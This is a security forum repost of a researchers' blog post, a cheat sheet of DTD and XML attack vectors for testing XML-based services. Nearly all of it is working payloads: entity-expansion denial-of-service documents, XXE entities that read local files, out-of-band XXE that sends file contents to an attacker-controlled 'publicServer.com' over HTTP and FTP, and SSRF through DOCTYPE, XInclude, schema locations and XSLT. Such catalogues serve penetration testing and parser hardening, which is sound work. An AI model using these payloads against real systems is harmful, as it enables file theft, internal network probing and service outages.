Jump to content
Nytro

DTD Cheat Sheet

By Nytro, in Securitate web

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Mittwoch, 2. März 2016

DTD Cheat Sheet

 
When evaluating the security of XML based services, one should always consider DTD based attack vectors, such as XML External Entities (XXE) as,for example, our previous post XXE in SAML Interfaces demonstrates.

In this post we provide a comprehensive list of different DTD attacks.

The attacks are categorized as follows:

Denial-of-Service Attacks

Testing for Entity Support

<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>
If this test is successful and and parsing process is slowed down, there is a high probability that your parser is configured insecurely and is vulnerable to at least one kind of DoS. 

 

Billion Laughs Attack (Klein, 2002)

<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
This file expands to about 30 KByte but has a total of 11111 entity references and therefore exceeds a reasonable threshold of entity references.
Source
 

Billion Laughs Attack - Parameter Entities (Späth, 2015)

<!DOCTYPE data SYSTEM "http://127.0.0.1:5000/dos_indirections_parameterEntity_wfc.dtd" [
<!ELEMENT data (#PCDATA)>
]>
<data>&g;</data>
File stored on http://publicServer.com/dos.dtd

  <!ENTITY % a0 "dos" >
<!ENTITY % a1 "%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;">
<!ENTITY % a2 "%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;">
<!ENTITY % a3 "%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;">
<!ENTITY % a4 "%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;">
<!ENTITY g  "%a4;" >  

Quadratic Blowup Attack

<!DOCTYPE data [
<!ENTITY a0 "dosdosdosdosdosdos...dos"
]>
<data>&a0;&a0;...&a0;</data>
Source
 

Recursive General Entities

This vector is not well-formed by [WFC: No Recursion].
  <!DOCTYPE data [
<!ENTITY a "a&b;" >
<!ENTITY b "&a;" >
]>
<data>&a;</data>  

External General Entities (Steuck, 2002)

The idea of this attack is to declare an external general entity and reference a large file on a network resource or locally (e.g. C:/pagefile.sys or /dev/random).
However, conducting DoS attacks in such a manner is only applicable by making the parser process alarge XML document.
  <?xml version='1.0'?>
<!DOCTYPE data [
<!ENTITY dos SYSTEM "file:///publicServer.com/largeFile.xml" >
]>
<data>&dos;</data>
Source
 

Classic XXE

Classic XXE Attack (Steuck, 2002)

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///sys/power/image_size">
]>
<data>&file;</data>
We use the file '/sys/power/image_size' as an example, because it is a very simple file (one line, no special characters).

This attack requires a direct feedback channel and reading out files is limited by "forbidden characters in XML" such as "<" and "&".
If such characters occur in the accessed file (e.g. /etc/fstab) the XML parser raises an exception and stops the parsing of the message.

Source

XXE Attack using netdoc

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#PCDATA)>
<!ENTITY file SYSTEM "netdoc:/sys/power/image_size">
]>
<data>&file;</data>
Source: @Nirgoldshlager

Evolved XXE Attacks - Direct Feedback Channel

This class of attacks vectors is called evolved XXE attacks and is used to (i) bypass restrictions of classic XXE attacks and (ii) for Out-of-Band attacks.

Bypassing Restrictions of XXE (Morgan, 2014)

  <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///sys/power/image_size">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://publicServer.com/parameterEntity_core.dtd">
%dtd;
]>
<data>&all;</data>
File stored on http://publicServer.com/parameterEntity_core.dtd
  <!ENTITY all '%start;%goodies;%end;'>   
Source
 

Bypassing Restrictions of XXE (Späth, 2015)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_doctype.dtd">
<data>&all;</data>
File stored on http://publicServer.com/parameterEntity_doctype.dtd
  <!ELEMENT data (#PCDATA)>
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///sys/power/image_size">
<!ENTITY % end "]]>">
<!ENTITY all '%start;%goodies;%end;'>  

XXE by abusing Attribute Values (Yunusov, 2013)

This vector bypasses [WFC: No External Entity References].

  <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd">
%remote;
]>
<data attrib='&internal;'/>
File stored on http://publicServer.com/external_entity_attribute.dtd 
  <!ENTITY % payload SYSTEM "file:///sys/power/image_size">
<!ENTITY % param1 "<!ENTITY internal '%payload;'>">
%param1;
Source
 

Evolved XXE Attacks - Out-of-Band channels

Just because there is no direct feedback channel available does not imply that an XXE attack is not possible. 

XXE OOB Attack (Yunusov, 2013)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>
File stored on http://publicServer.com/parameterEntity_oob.dtd
  <!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;

Source



XXE OOB Attack - Parameter Entities (Yunusov, 2013)

Here is a variation of the previous attack using only parameter entities.
  <?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendhttp.dtd">
%remote;
%send;
]>
<data>4</data>
File stored on http://publicServer.com/parameterEntity_sendhttp.dtd
  <!ENTITY % payload SYSTEM "file:///sys/power/image_size">
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'http://publicServer.com/%payload;'>">
%param1;
Source
 

XXE OOB Attack - Parameter Entities FTP (Novikov, 2014)

Using the FTP protocol, an attacker can read out files of arbitrary length.
  <?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>
<data>4</data>
File stored on http://publicServer.com/parameterEntity_sendftp.dtd

  <!ENTITY % payload SYSTEM "file:///sys/power/image_size">
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;
This attack requires to setup a modified FTP server. However, adjustments to this PoC code are probably necessary to apply it to an arbitrary parser.

Source
 

SchemaEntity Attack (Späth, 2015)

We identified three variations of this attack using (i) schemaLocation, (ii) noNamespaceSchemaLocation and (iii) XInclude.
 

schemaLocation

<?xml version='1.0'?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd">
%remote; 
]>
<ttt:data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:ttt="http://test.com/attack"
xsi:schemaLocation="ttt http://publicServer.com/&internal;">4  

noNamespaceSchemaLocation

<?xml version='1.0'?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd">
%remote; 
]>
<data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:noNamespaceSchemaLocation="http://publicServer.com/&internal;"></data>  

XInclude

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd">
%remote; 
]>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://192.168.2.31/&internal;" parse="text"></xi:include></data>

File stored on http://publicServer.com/external_entity_attribute.dtd
  <!ENTITY % payload SYSTEM "file:///sys/power/image_size">
<!ENTITY % param1 "<!ENTITY internal '%payload;'>">
%param1;

 

SSRF Attacks

DOCTYPE

<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/" [
<!ELEMENT data (#ANY)>
]>
<data>4</data>
 
 

External General Entity (Steuck, 2002)

<?xml version='1.0'?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY remote SYSTEM "http://internalSystem.com/file.xml">
]>
<data>&remote;</data>
Although it is best to reference a well-formed XML file (or any text file for that matter), in order not to cause an error, it is possible with some parsers to invoke an URL without referencing a not well-formed file.

Source

External Parameter Entity (Yunusov, 2013)

<?xml version='1.0'?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY % remote SYSTEM "http://publicServer.com/url_invocation_parameterEntity.dtd">
%remote; 
]>
<data>4</data>
File stored on http://publicServer.com/url_invocation_parameterEntity.dtd
  <!ELEMENT data2 (#ANY)>
Source

XInclude

<?xml version='1.0'?>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml"></xi:include></data>
File stored on http://publicServer.com/file.xml

  <?xml version='1.0' encoding='utf-8'?><data>it_works</data>  

schemaLocation

<?xml version='1.0'?>
<ttt:data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:ttt="http://test.com/attack"
xsi:schemaLocation="http://publicServer.com/url_invocation_schemaLocation.xsd">4</ttt:data>
File stored on http://publicServer.com/url_invocation_schemaLocation.xsd
  <?xml version="1.0" encoding="UTF-8"?>
<xs:schema
     xmlns:xs="http://www.w3.org/2001/XMLSchema">
 <xs:element name="data" type="xs:string"/>
</xs:schema>
or use this file
  <?xml version="1.0" encoding="UTF-8"?>
<xs:schema
     xmlns:xs="http://www.w3.org/2001/XMLSchema"
 targetNamespace="http://test.com/attack">
 <xs:element name="data" type="xs:string"/>
</xs:schema>  

noNamespaceSchemaLocation


<?xml version='1.0'?>
<data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd">4</data>
File stored on http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd
 
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema
     xmlns:xs="http://www.w3.org/2001/XMLSchema">
 <xs:element name="data" type="xs:string"/>
</xs:schema>  

XInclude Attacks (Morgan, 2014)

<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="/sys/power/image_size"></xi:include></data>
Source

XSLT Attacks

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
   <xsl:template match="/">
       <xsl:value-of select="document('/sys/power/image_size')">
   </xsl:value-of></xsl:template>
</xsl:stylesheet>

 

Authors of this Post

Christopher Späth 
Christian Mainka (@CheariX
Vladislav Mladenov 

Sursa: 

http://web-in-security.blogspot.ro/2016/03/xxe-cheat-sheet.html

 

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...